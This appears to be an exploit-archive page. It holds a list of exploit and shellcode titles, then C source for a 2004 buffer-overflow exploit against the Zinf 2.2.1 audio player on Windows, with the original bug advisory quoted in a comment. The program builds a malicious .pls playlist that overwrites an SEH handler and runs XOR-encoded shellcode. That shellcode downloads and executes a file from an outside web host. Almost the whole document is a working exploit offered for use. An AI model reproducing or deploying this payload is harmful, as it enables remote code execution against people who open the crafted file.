880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
183 lines
No EOL
5.1 KiB
C
183 lines
No EOL
5.1 KiB
C
/*
|
|
-------------------------------Advisory----------------------------------
|
|
Luigi Auriemma <aluigi(aaaatttttt)autistici[D000t]org>
|
|
|
|
I don't know why this bug has not been tracked but moreover I don't
|
|
completely know why it has not been fixed yet in the Windows version of
|
|
Zinf.
|
|
|
|
In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
|
|
The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
|
|
which is still vulnerable to a buffer-overflow bug in the management of the
|
|
playlist files ".pls".
|
|
|
|
This bug has been found and fixed by the same developers in the recent
|
|
versions for Linux but, as already said, the vulnerable Windows version is
|
|
still downloadable and can be exploited locally and remotely through the web
|
|
browser and a malicious pls file.
|
|
|
|
A simple proof-of-concept to test the bug is available here:
|
|
|
|
http://aluigi.altervista.org/poc/zinf-bof.pls
|
|
|
|
That's all, just to keep track of this bug and to warn who uses the Windows
|
|
version.
|
|
|
|
|
|
BYEZ
|
|
--------------------------------------------------------------------------
|
|
hey Luigi how much Advisories do you release every month??maybe 30 ;)??
|
|
sometimes i think your day has 48 hours ;)
|
|
|
|
best regards
|
|
|
|
|
|
|
|
----------------------------------------------------------------------------
|
|
this exploit generates a file exploit.pls which overflows a seh handler
|
|
jumps into a service pack independent address then it downloads and executes a file
|
|
|
|
|
|
you can also download this exploit i a rar file(www.delikon.de).
|
|
in this rar file you will find some screenshots, from OllyDbg
|
|
which is maybe useful for beginners
|
|
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <windows.h>
|
|
|
|
#define SIZE 4048
|
|
|
|
|
|
char shellcode[] = "\xEB"//xored with 0x1d
|
|
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
|
|
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
|
|
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
|
|
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
|
|
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
|
|
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
|
|
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
|
|
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
|
|
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
|
|
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
|
|
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
|
|
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
|
|
"\x78\x65\x78\x1D";
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
int main(){
|
|
|
|
char buffer[SIZE];
|
|
char exploit[]="exploit.pls";
|
|
char head[]="[playlist]File1=";
|
|
int i=0;
|
|
ULONG bytes=0;
|
|
char *pointer=NULL;
|
|
//for the decoder
|
|
short int weblength=0xff22;
|
|
|
|
|
|
ULONG RetAddr=0x10404DC4;
|
|
/*
|
|
SERVICE PACK independent
|
|
httpinput.pmi
|
|
10404DC4 5D POP EBP
|
|
10404DC5 B8 18000000 MOV EAX,18
|
|
10404DCA 5B POP EBX
|
|
10404DCB C2 0800 RETN 8
|
|
*/
|
|
//jump into nops
|
|
DWORD jump=0x909025eb;
|
|
HANDLE file=NULL;
|
|
|
|
//this is a small messageBox app
|
|
char web[]="http://www.delikon.de/klein.exe";
|
|
|
|
|
|
printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
|
|
printf("Coded by Delikon|www.delikon.de|27.9.04\n");
|
|
printf("all credits goes to Luigi Auriemma\n");
|
|
printf("\n [+] generate exploit.pls\n");
|
|
|
|
|
|
|
|
memset(buffer,0x00,SIZE-1);
|
|
|
|
|
|
file = CreateFile(exploit, GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL);
|
|
|
|
if(file == (HANDLE)0xffffffff){
|
|
|
|
printf("\t[+] error opening the file\n");
|
|
printf("PRESS A KEY\n");
|
|
getchar();
|
|
return -1;
|
|
|
|
}
|
|
strcpy(buffer,head);
|
|
|
|
memset(buffer+strlen(buffer),0x61,17);
|
|
//nops
|
|
memset(buffer+strlen(buffer),0x90,20);
|
|
//
|
|
strcat(buffer,shellcode);
|
|
//search for the shellcode length
|
|
pointer=strstr(buffer,"\x22\xff");
|
|
//weblength[0]-=strlen(web)+1;
|
|
weblength-=strlen(web)+1;
|
|
//increase it
|
|
memcpy(pointer,&weblength,2);
|
|
|
|
|
|
//copy the url in the buffer
|
|
strcat(buffer,web);
|
|
|
|
|
|
//xor the url with 0x1d
|
|
while(*(buffer+strlen(buffer)-strlen(web)+i)){
|
|
|
|
|
|
*(buffer+strlen(buffer)-strlen(web)+i)=*(buffer+strlen(buffer)-strlen(web)+i)^0x1d;
|
|
i++;
|
|
}
|
|
|
|
*(buffer+strlen(buffer)-strlen(web)+i)=0x1d;
|
|
|
|
//copy the filling
|
|
memset(buffer+strlen(buffer),0x61,517-strlen(buffer));
|
|
//also filling ;)
|
|
memcpy(buffer+strlen(buffer),&RetAddr,4);
|
|
|
|
memset(buffer+strlen(buffer),0x41,4);
|
|
memset(buffer+strlen(buffer),0x42,4);
|
|
|
|
//jump 24 bytes forward
|
|
memcpy(buffer+strlen(buffer),&jump,4);
|
|
//jump into pop reg pop reg ret
|
|
memcpy(buffer+strlen(buffer),&RetAddr,4);
|
|
memset(buffer+strlen(buffer),0x45,4);
|
|
memset(buffer+strlen(buffer),0x46,4);
|
|
memset(buffer+strlen(buffer),0x47,4);
|
|
|
|
|
|
|
|
WriteFile(file,buffer,strlen(buffer),&bytes,0);
|
|
|
|
CloseHandle(file);
|
|
printf("\n [+] ready press a key\n");
|
|
getchar();
|
|
|
|
|
|
exit(1);
|
|
|
|
|
|
}
|
|
|
|
// milw0rm.com [2004-09-28]
|